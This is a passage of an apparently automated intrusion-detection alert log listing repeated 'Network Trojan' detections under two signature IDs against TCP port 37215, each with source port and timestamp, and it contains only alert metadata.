              SID:2829579
              Source Port:58322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.832432
              SID:2829579
              Source Port:39102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536323
              SID:2829579
              Source Port:48822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859979
              SID:2829579
              Source Port:46792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303358
              SID:2829579
              Source Port:51560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519537
              SID:2829579
              Source Port:39992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575230
              SID:2835222
              Source Port:49962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918306
              SID:2835222
              Source Port:36926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449259
              SID:2835222
              Source Port:33920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536570
              SID:2835222
              Source Port:52494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725144
              SID:2829579
              Source Port:33314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157523
              SID:2829579
              Source Port:40976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201189
              SID:2829579
              Source Port:55674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631379
              SID:2829579
              Source Port:53156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801849
              SID:2829579
              Source Port:42952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491435
              SID:2829579
              Source Port:38454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631874
              SID:2829579
              Source Port:42644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797862
              SID:2829579
              Source Port:57738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485292
              SID:2829579
              Source Port:44150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186456
              SID:2829579
              Source Port:41554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397207
              SID:2835222
              Source Port:38112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603829
              SID:2829579
              Source Port:41292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205932
              SID:2829579
              Source Port:40334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525289
              SID:2835222
              Source Port:38646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.463108
              SID:2835222
              Source Port:34846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098186
              SID:2829579
              Source Port:55086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.580579
              SID:2829579
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575167
              SID:2829579
              Source Port:38670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486052
              SID:2835222
              Source Port:51850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049726
              SID:2829579
              Source Port:53276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725339
              SID:2829579
              Source Port:42108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.584816
              SID:2835222
              Source Port:40790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576495
              SID:2829579
              Source Port:57366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374110
              SID:2829579
              Source Port:41948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550787
              SID:2835222
              Source Port:47700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057244
              SID:2829579
              Source Port:52570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411283
              SID:2829579
              Source Port:42252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446996
              SID:2829579
              Source Port:40948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125315
              SID:2829579
              Source Port:58952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552747
              SID:2829579
              Source Port:41790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459028
              SID:2835222
              Source Port:49958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833682
              SID:2829579
              Source Port:55524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979704
              SID:2829579
              Source Port:37626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581984
              SID:2829579
              Source Port:35114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.317980
              SID:2835222
              Source Port:44222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372565
              SID:2835222
              Source Port:43972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382764
              SID:2835222
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856518
              SID:2829579
              Source Port:47266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535546
              SID:2835222
              Source Port:53082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870338
              SID:2829579
              Source Port:39860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681336
              SID:2829579
              Source Port:37048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101301
              SID:2829579
              Source Port:38658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435323
              SID:2835222
              Source Port:42846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531942
              SID:2829579
              Source Port:60022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923627
              SID:2829579
              Source Port:57842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186510
              SID:2835222
              Source Port:35668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.665007
              SID:2829579
              Source Port:49592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368699
              SID:2829579
              Source Port:37206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302915
              SID:2835222
              Source Port:34048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070062
              SID:2829579
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235741
              SID:2829579
              Source Port:33384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484638
              SID:2829579
              Source Port:47884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168077
              SID:2829579
              Source Port:39600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114588
              SID:2835222
              Source Port:56524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671783
              SID:2835222
              Source Port:38578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661339
              SID:2835222
              Source Port:49626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885930
              SID:2829579
              Source Port:49606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.354996
              SID:2829579
              Source Port:33376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383270
              SID:2829579
              Source Port:37962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522331
              SID:2829579
              Source Port:59198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062767
              SID:2829579
              Source Port:53732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452629
              SID:2835222
              Source Port:60048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250723
              SID:2835222
              Source Port:33456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604713
              SID:2835222
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625706
              SID:2829579
              Source Port:48186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663502
              SID:2829579
              Source Port:43224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431263
              SID:2829579
              Source Port:41284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329681
              SID:2829579
              Source Port:33668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607058
              SID:2829579
              Source Port:44552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856517
              SID:2829579
              Source Port:59000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513409
              SID:2829579
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517825
              SID:2835222
              Source Port:52802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661319
              SID:2835222
              Source Port:56050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759934
              SID:2835222
              Source Port:42790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537061
              SID:2829579
              Source Port:59188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358459
              SID:2829579
              Source Port:53908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695197
              SID:2835222
              Source Port:45688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055508
              SID:2829579
              Source Port:48268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457712
              SID:2829579
              Source Port:38318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536012
              SID:2835222
              Source Port:39762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486505
              SID:2829579
              Source Port:47350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692328
              SID:2835222
              Source Port:33186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455320
              SID:2829579
              Source Port:54222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538261
              SID:2835222
              Source Port:59196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726215
              SID:2829579
              Source Port:39824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303340
              SID:2829579
              Source Port:55750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063873
              SID:2835222
              Source Port:48294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358470
              SID:2835222
              Source Port:33428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059603
              SID:2835222
              Source Port:48292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661365
              SID:2829579
              Source Port:56930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249987
              SID:2835222
              Source Port:59756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538703
              SID:2835222
              Source Port:44504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.074233
              SID:2835222
              Source Port:54716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202854
              SID:2835222
              Source Port:51594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492364
              SID:2835222
              Source Port:46170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234685
              SID:2835222
              Source Port:37684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726788
              SID:2829579
              Source Port:56042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116702
              SID:2835222
              Source Port:54864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432256
              SID:2829579
              Source Port:42880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099730
              SID:2835222
              Source Port:40136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.418933
              SID:2835222
              Source Port:36970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724322
              SID:2835222
              Source Port:34706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371949
              SID:2835222
              Source Port:35856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300063
              SID:2829579
              Source Port:52034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459500
              SID:2835222
              Source Port:44230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100475
              SID:2829579
              Source Port:44130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308722
              SID:2829579
              Source Port:59444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857848
              SID:2835222
              Source Port:54896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878802
              SID:2829579
              Source Port:41252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702594
              SID:2829579
              Source Port:51746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061511
              SID:2835222
              Source Port:53148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157665
              SID:2835222
              Source Port:46298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538124
              SID:2829579
              Source Port:53888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640891
              SID:2829579
              Source Port:44882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231827
              SID:2829579
              Source Port:36454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361327
              SID:2835222
              Source Port:33762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115092
              SID:2835222
              Source Port:33324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756171
              SID:2835222
              Source Port:59828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053807
              SID:2829579
              Source Port:58704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193873
              SID:2829579
              Source Port:52806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802463
              SID:2829579
              Source Port:52326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424242
              SID:2829579
              Source Port:41330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067265
              SID:2835222
              Source Port:34736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361343
              SID:2835222
              Source Port:56374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286781
              SID:2829579
              Source Port:40712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972389
              SID:2835222
              Source Port:40070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549906
              SID:2829579
              Source Port:35730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519089
              SID:2835222
              Source Port:39288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989911
              SID:2835222
              Source Port:55658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105729
              SID:2835222
              Source Port:40326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692454
              SID:2829579
              Source Port:50284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061799
              SID:2829579
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332206
              SID:2835222
              Source Port:45740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875722
              SID:2829579
              Source Port:48982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756320
              SID:2835222
              Source Port:41906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187417
              SID:2829579
              Source Port:39984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578699
              SID:2835222
              Source Port:38526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575558
              SID:2835222
              Source Port:41250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727031
              SID:2829579
              Source Port:45120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113610
              SID:2835222
              Source Port:32874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076933
              SID:2835222
              Source Port:43864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233695
              SID:2835222
              Source Port:55392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431275
              SID:2835222
              Source Port:60728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857393
              SID:2835222
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402777
              SID:2835222
              Source Port:44798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704171
              SID:2835222
              Source Port:47338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639473
              SID:2835222
              Source Port:46896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474583
              SID:2829579
              Source Port:43100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481500
              SID:2835222
              Source Port:36158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098899
              SID:2829579
              Source Port:52552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535996
              SID:2835222
              Source Port:46616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486435
              SID:2829579
              Source Port:51720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918397
              SID:2829579
              Source Port:52382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123784
              SID:2829579
              Source Port:37622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548267
              SID:2835222
              Source Port:36618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.751572
              SID:2835222
              Source Port:57592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431405
              SID:2835222
              Source Port:44082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358605
              SID:2829579
              Source Port:49890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234683
              SID:2835222
              Source Port:41986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119687
              SID:2829579
              Source Port:49744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.677360
              SID:2835222
              Source Port:58056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345322
              SID:2835222
              Source Port:49760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492398
              SID:2829579
              Source Port:59754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538225
              SID:2829579
              Source Port:56502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.158793
              SID:2829579
              Source Port:49116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.886886
              SID:2835222
              Source Port:50980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150514
              SID:2835222
              Source Port:51800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265951
              SID:2835222
              Source Port:55942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543667
              SID:2835222
              Source Port:58968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579380
              SID:2829579
              Source Port:59428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116615
              SID:2829579
              Source Port:39028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411747
              SID:2835222
              Source Port:53688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162931
              SID:2835222
              Source Port:36870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856897
              SID:2835222
              Source Port:40744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044533
              SID:2835222
              Source Port:34892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397186
              SID:2835222
              Source Port:42070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640497
              SID:2829579
              Source Port:36172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458343
              SID:2829579
              Source Port:49004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575504
              SID:2835222
              Source Port:48138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446400
              SID:2835222
              Source Port:42838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.830584
              SID:2835222
              Source Port:36076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490477
              SID:2835222
              Source Port:32796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078437
              SID:2829579
              Source Port:55656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.770906
              SID:2835222
              Source Port:55370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606314
              SID:2835222
              Source Port:41672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077038
              SID:2829579
              Source Port:37828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308875
              SID:2835222
              Source Port:54122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705966
              SID:2829579
              Source Port:57942
              Destination Port:37215
